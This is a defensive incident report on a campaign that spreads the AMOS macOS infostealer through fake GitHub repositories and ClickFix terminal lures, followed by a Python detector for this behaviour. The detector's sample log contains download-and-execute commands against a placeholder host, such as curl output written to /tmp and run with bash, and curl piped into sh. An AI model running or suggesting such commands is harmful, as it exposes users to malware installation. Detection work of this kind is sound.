Full Report
LastPass is warning users of a campaign that targets macOS users with malicious software impersonating popular products delivered through fraudulent GitHub repositories. [...]
Analysis Summary
# Incident Report: Fake Password Managers Infect Mac Users with AMOS Stealer
## Executive Summary
A recent campaign targeted macOS users by distributing malware disguised as legitimate software, including the legitimate password manager LastPass, via fraudulent GitHub repositories. Attackers leveraged search engine optimization (SEO) to promote these repositories, leading victims to execute a "ClickFix" command that downloaded and installed the Atomic (AMOS) infostealer. The outcome is the potential compromise of user data by a sophisticated, persistent malware-as-a-service operation.
## Incident Details
- Discovery Date: Unknown; the campaign was first publicly disclosed in LastPass's warning of September 22, 2025.
- Incident Date: Ongoing at the time of reporting.
- Affected Organization: LastPass (as the primary entity warning users) and numerous software vendors whose products were impersonated.
- Sector: Technology/Software Distribution (affecting end-users across various sectors).
- Geography: Global (any macOS user who reaches the fraudulent repositories through public search engine results).
## Timeline of Events
### Initial Access
- Date/Time: Ongoing campaign prior to September 22, 2025.
- Vector: Deceptive search engine results (SEO) promoting fraudulent repositories and pages hosted on GitHub.
- Details: Attackers created numerous deceptive GitHub repositories impersonating over 100 software products (e.g., LastPass, 1Password, Dropbox, Notion). Each repository contained a prominent "download button" leading to a secondary site that presented the command to run.
### Lateral Movement
- Details: Not explicitly detailed in the primary report, but the AMOS infostealer is designed to target and steal data on infected machines. Furthermore, a recently added backdoor component suggests an intent for **persistent access**.
### Data Exfiltration/Impact
- Details: The payload delivered was the **Atomic (AMOS) infostealer**, which collects data from infected machines. The malware is offered as a Malware-as-a-Service (MaaS) subscription.
### Detection & Response
- Detection: LastPass identified and began monitoring the campaign.
- Response actions taken: LastPass is actively reporting the fake repositories to GitHub for takedown, though new ones are rapidly created.
## Attack Methodology
- Initial Access: **Social Engineering/Phishing via SEO** leading to execution of malicious commands.
- Persistence: **Backdoor component** recently added to the AMOS malware (implied for persistent stealthy access).
- Privilege Escalation: Not explicitly detailed, but likely achieved through system commands executed by the user.
- Defense Evasion: Use of numerous, disposable GitHub accounts to host repositories to evade takedowns.
- Credential Access: Infostealer capability of AMOS framework.
- Discovery: Attackers relied on victims searching for legitimate software.
- Lateral Movement: Not specified beyond initial endpoint compromise.
- Collection: AMOS targets data on infected machines.
- Exfiltration: Implied as part of the AMOS MaaS capabilities.
- Impact: Installation of information-stealing malware.
## Impact Assessment
- Financial: Unknown direct costs, but the AMOS framework itself is a commercialized service ($1,000/month).
- Data Breach: Theft of sensitive data and credentials residing on compromised macOS systems.
- Operational: Potential operational disruption for individual users whose systems are compromised by the infostealer.
- Reputational: Negative impact on the brands whose software was impersonated, and on the security posture of affected users.
## Indicators of Compromise
*Note: Specific IoCs are not provided in the text; the primary indicator mechanism is identified behavior.*
- Network indicators: N/A (no specific URLs/IPs provided). The observed activity involved `curl` requests to download payloads.
- File indicators: **install.sh** (payload download script, typically written to the `/tmp` directory).
- Behavioral indicators: User being tricked into pasting and running an unrecognized command into the macOS Terminal (ClickFix technique).
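As an added example (not part of the LastPass warning or of this summary), the following Python checks process-start events for the behavioral chain described above: a `curl` download written into `/tmp` that the same user then executes from a terminal shortly afterwards, or a download piped straight into a shell. The log format, the field names, the `example.invalid` URLs and the sample events are all constructed assumptions.

```python
import re
import shlex
from datetime import datetime

# Constructed sample process-start events (not real telemetry): UTC timestamp,
# user, responsible application, and the quoted command line.
SAMPLE_EVENTS = """\
2025-09-22T10:14:03Z user=alice app=Terminal cmd="curl -fsSL https://example.invalid/dl/install.sh -o /tmp/install.sh"
2025-09-22T10:14:05Z user=alice app=Terminal cmd="bash /tmp/install.sh"
2025-09-22T11:02:10Z user=bob app=Terminal cmd="curl -s https://example.invalid/x | sh"
2025-09-22T12:30:00Z user=carol app=Terminal cmd="brew install lastpass-cli"
"""
LINE_RE = re.compile(r'^(\S+) user=(\S+) app=(\S+) cmd="(.*)"$')
DOWNLOADERS, SHELLS = {"curl", "wget"}, {"sh", "bash", "zsh"}

def parse_event(line):
    """Parse one constructed log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, user, app, cmd = m.groups()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "user": user,
            "app": app, "cmd": cmd, "argv": shlex.split(cmd)}

def tmp_download_target(argv):
    """Path under /tmp that a curl/wget invocation writes to, or None."""
    if argv[0] not in DOWNLOADERS:
        return None
    return next((a for a in argv[1:] if a.startswith("/tmp/")), None)

def detect_clickfix(log_text, window_seconds=300):
    """Return (user, reason) findings: a download piped into a shell, or a /tmp
    download followed by the same user running that script within the window.
    Only commands launched from Terminal count, since ClickFix relies on the
    victim pasting the command into a terminal themselves."""
    findings, pending = [], {}  # pending: user -> (time, /tmp path) of last download
    for ev in filter(None, map(parse_event, log_text.splitlines())):
        if ev["app"] != "Terminal" or not ev["argv"]:
            continue
        argv = ev["argv"]
        if argv[0] in DOWNLOADERS and "|" in argv and argv[-1] in SHELLS:
            findings.append((ev["user"], "download piped to shell: " + ev["cmd"]))
        elif (path := tmp_download_target(argv)):
            pending[ev["user"]] = (ev["ts"], path)
        elif argv[0] in SHELLS and len(argv) > 1 and argv[1].startswith("/tmp/"):
            prev = pending.get(ev["user"])
            if prev and prev[1] == argv[1] and (ev["ts"] - prev[0]).total_seconds() <= window_seconds:
                findings.append((ev["user"], "download-then-execute chain: " + argv[1]))
    return findings
```

On the sample events the function reports alice's two-step chain and bob's piped download, while carol's ordinary package install is ignored.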
## Response Actions
- Containment: LastPass is working to contain reputational risk by warning users.
- Eradication: Implied need for user-level removal of the AMOS payload and any associated persistence mechanisms.
- Recovery: Users must reset any credentials exposed on the infected system and secure their systems post-infection.
## Lessons Learned
- Reliance on search engine results and non-official download sources for software is highly dangerous.
- Attackers are successfully leveraging SEO to funnel victims into execution chains (ClickFix).
- The threat landscape evolves, with malware like AMOS adding persistence components (backdoors).
## Recommendations
- **User Education:** Scrutinize any command a website asks you to run, particularly one meant to be pasted into the Terminal, before executing it.
- **Source Verification:** Only download software from the verified, official vendor websites. If a macOS version is not available there, assume third-party variants are likely malicious.
- **Monitoring:** Security teams should monitor for high-ranking, deceptive search results related to internal tools or frequently used software.